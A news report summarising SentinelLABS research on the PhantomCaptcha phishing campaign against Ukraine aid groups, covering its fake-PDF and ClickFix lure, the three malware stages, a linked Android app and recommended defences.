PhantomCaptcha Cyberattack Hits Ukraine Aid Groups
▼ Summary
– A coordinated phishing campaign called “PhantomCaptcha” targeted humanitarian and government organizations supporting Ukraine’s war relief efforts by impersonating the Ukrainian President’s Office.
– The attack began on October 8, 2025, using phishing emails with a malicious PDF that directed victims to a fake Zoom site to execute malware through a “ClickFix” technique.
– The malware operated in three stages: an obfuscated downloader, a reconnaissance module, and a WebSocket-based RAT for command execution and data exfiltration.
– Researchers linked the campaign to a broader operation involving malicious Android apps disguised as adult entertainment or cloud storage services, distributing apps like princess.apk to collect device data.
– To defend against such threats, organizations should monitor PowerShell activity, enforce execution policies, and track suspicious WebSocket connections, while users should avoid pasting commands into Windows Run dialogs.
A sophisticated and highly targeted phishing campaign, now identified as PhantomCaptcha, has been actively targeting humanitarian and government bodies involved in providing aid to Ukraine. Security analysts from SentinelLABS and the Digital Security Lab of Ukraine have detailed how this operation impersonated the Ukrainian President’s Office to distribute malware through a deceptive PDF attachment.
The attack commenced on October 8, 2025, when staff from prominent organizations, including the International Red Cross, UNICEF, the Norwegian Refugee Council, and multiple Ukrainian regional administrations, received fraudulent emails. These messages contained an eight-page PDF file disguised as an official government memorandum. Upon opening the document, recipients were redirected to a counterfeit Zoom website hosted on infrastructure linked to a Russian service provider.
A fake Cloudflare verification page then appeared, instructing users to carry out a series of actions. These steps ultimately triggered a PowerShell command, enabling the attackers to install harmful software directly onto the system. This method, often called “ClickFix” or “Paste and Run,” relies on individuals unknowingly executing malicious code, effectively bypassing conventional security protocols.
The malware deployed in the PhantomCaptcha campaign functioned in three distinct phases. The first stage involved a heavily obfuscated downloader script, over 500KB in size, which fetched additional malicious payloads. Next, a reconnaissance module collected critical system details such as identifiers, usernames, and domain information. Finally, a WebSocket-based remote access Trojan (RAT) was installed, giving attackers the ability to run commands and exfiltrate sensitive data.
Researchers observed that the attack infrastructure remained active for only a single day, a clear effort to avoid detection. However, backend servers continued operating to maintain control over already compromised devices. Investigators also connected PhantomCaptcha to a broader malicious operation involving Android applications disguised as adult content or cloud storage services. One domain, princess-mens[.]click, distributed an app named princess.apk, which harvested contact lists, media files, SIM card data, and location information from infected mobile devices. Although related, this mobile component is being monitored as a separate cluster of activity.
SentinelLABS described the campaign as the work of a highly capable threat actor, emphasizing the extensive planning, segmented infrastructure, and careful management of operational exposure. They noted that the six-month gap between initial infrastructure setup and the actual attack, combined with the rapid removal of user-facing domains while preserving backend control, points to an operator skilled in both offensive tactics and defensive evasion.
To guard against such threats, experts recommend exercising caution with any instructions that ask users to paste commands into Windows Run dialogs. Organizations are advised to monitor PowerShell usage closely, enforce strict execution policies, and watch for unusual WebSocket connections, especially those tied to newly created or impersonated domains.
(Source: Info Security)
